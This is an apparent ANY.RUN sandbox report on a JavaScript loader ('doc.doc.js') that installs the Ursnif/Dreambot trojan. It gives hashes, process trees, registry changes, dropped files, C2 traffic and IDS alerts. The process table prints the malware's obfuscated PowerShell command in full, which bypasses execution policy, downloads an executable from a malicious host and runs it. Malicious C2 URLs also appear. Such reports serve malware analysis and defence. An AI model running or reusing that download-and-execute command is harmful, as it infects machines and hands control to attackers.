analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

doc.doc.js

Full analysis: https://app.any.run/tasks/26d31600-ff3d-4853-addc-41c381907126
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 03:27:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
evasion
dreambot
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

BB1F6BA7497C8B8EBF96780E89589D52

SHA1:

72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1

SHA256:

A8618B73AF6706331E6E47D655BEE5B0D08F3349ED7DF70714C66296D000C1FC

SSDEEP:

192:B1UGh2AnP3I8hSTMsrN4ZjwP1ttvqmGOpoZ1emwVesKf0Hkgp24R4tkJqP9tVkBB:B1UM2AnP3I8hSTMsrN4ZjwP1ttvqmzKq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3840)
    • Application was dropped or rewritten from another process

      • TempbsK70.exe (PID: 2152)
    • Runs injected code in another process

      • TempbsK70.exe (PID: 2152)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3140)
    • Detected URSNIF Trojan

      • TempbsK70.exe (PID: 2152)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 2036)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 2036)
    • Application was injected by another process

      • explorer.exe (PID: 2036)
    • Connects to CnC server

      • explorer.exe (PID: 2036)
  • SUSPICIOUS

    • Executes scripts

      • explorer.exe (PID: 2036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3140)
      • TempbsK70.exe (PID: 2152)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3364)
      • explorer.exe (PID: 2036)
    • Creates files in the user directory

      • powershell.exe (PID: 3140)
      • TempbsK70.exe (PID: 2152)
    • Checks for external IP

      • nslookup.exe (PID: 352)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempbsk70.exe #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3364"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\doc.doc.js"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3840"C:\Windows\System32\cmd.exe" /c dRPSwHkjGELpyDb & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','%temp%bsK70.exe'); & start %temp%bsK70.exe & gZBHciRsnSOXFuNC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3140powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','C:\Users\admin\AppData\Local\TempbsK70.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2152C:\Users\admin\AppData\Local\TempbsK70.exe C:\Users\admin\AppData\Local\TempbsK70.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2036C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3380cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\5EA6.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
352nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3844cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\5EA6.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
343
Read events
261
Write events
81
Delete events
1

Modification events

(PID) Process:(3364) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3364) WScript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3140) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
2
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z85D1A3Y3HU1NXPG44IL.temp
MD5:
SHA256:
3380cmd.exeC:\Users\admin\AppData\Local\Temp\5EA6.bi1
MD5:
SHA256:
3844cmd.exeC:\Users\admin\AppData\Local\Temp\5EA6.bi1
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Local\Temp\79B7.bin
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.jstext
MD5:B99A14DD4819D1AE8BED40FA744929D4
SHA256:4BAFB432100E622B0988C72EB504005A7B746AEFE7D876F95B6B9BDA40D63182
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1063fb.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3140powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3140powershell.exeC:\Users\admin\AppData\Local\TempbsK70.exeexecutable
MD5:EA4907A6AC5AE8CCBC11CA8B5726F101
SHA256:F5A5E7D86C3131B3F0A479FA55F35F8FA7C0EA7615B244752F96071156982071
2152TempbsK70.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exeexecutable
MD5:EA4907A6AC5AE8CCBC11CA8B5726F101
SHA256:F5A5E7D86C3131B3F0A479FA55F35F8FA7C0EA7615B244752F96071156982071
2036explorer.exeC:\Users\admin\AppData\Local\Temp\8F60.bincompressed
MD5:C2953F4F180DC5F9FA68623630F57D60
SHA256:19A15D5C867F2E26312B5F61A2BFF22E80F3D8E0C8C3BF89811037B2CAC4B5D8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2036
explorer.exe
GET
82.208.161.228:80
http://adonis-medicine.at/images/sESlYgjQzNlhUT/aY6kcV1KtXV6P7tlP2zTW/gUQP7WuLhh60qgs4/8iKjepjrjcAvF6P/FOdHm3RNxRHDjw_2Fr/6dTR27IMs/67H7_2BvbkbUXFQOChkb/Gj3bA6gQ8Xlpi6uvLPu/9bj_2FX1VYs4friwMBpms3/YEBkSItyRQ9kb/3m_2BuuH/jh4pIkb9HjcJWl6oET64Y7W/ey.gif
RO
malicious
3140
powershell.exe
GET
200
37.34.176.37:80
http://instant-payments.ru/read.exe
KW
executable
502 Kb
malicious
2036
explorer.exe
POST
82.208.161.228:80
http://adonis-medicine.at/images/Ux06UP_2Fpwf_/2BkSaS2Z/MxLlZoWcW3ZcSHMnjL5cNdZ/nNiEUGhV_2/Bl6IGZeAPGpTGtJdE/HqTidjbNmgJ5/UVCMyrtLGsp/nYQlJCYOWxjOSZ/9_2FB5YaN2RMkbHtGCpAW/COOT9NEPB09R9GE_/2BWsRKN92XyJ0Gm/GFWJT2X6PivLYA3hic/lE0HekSqT/8TV4EYdMe6n7PviDpwMs/nWnWT3dfR/bFQYzoWo.bmp
RO
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
2036
explorer.exe
82.208.161.228:80
adonis-medicine.at
Liberty Global Operations B.V.
RO
malicious
3140
powershell.exe
37.34.176.37:80
instant-payments.ru
Mobile Telecommunications Company
KW
malicious

DNS requests

Domain
IP
Reputation
instant-payments.ru
  • 37.34.176.37
  • 62.73.70.146
  • 197.157.216.75
  • 87.116.78.110
  • 92.86.0.85
  • 62.141.241.11
  • 197.255.246.6
  • 93.103.166.70
  • 217.12.199.168
  • 89.45.19.18
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 185.217.117.168
shared
adonis-medicine.at
  • 82.208.161.228
  • 89.190.74.198
  • 86.61.75.99
  • 62.73.70.146
  • 109.175.7.8
  • 84.224.225.228
  • 195.222.40.54
  • 203.91.116.53
  • 95.158.162.200
  • 195.228.41.2
malicious

Threats

PID
Process
Class
Message
3140
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
352
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
352
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2036
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
2036
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Data Exfil
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
3 ETPRO signatures available at the full report
No debug info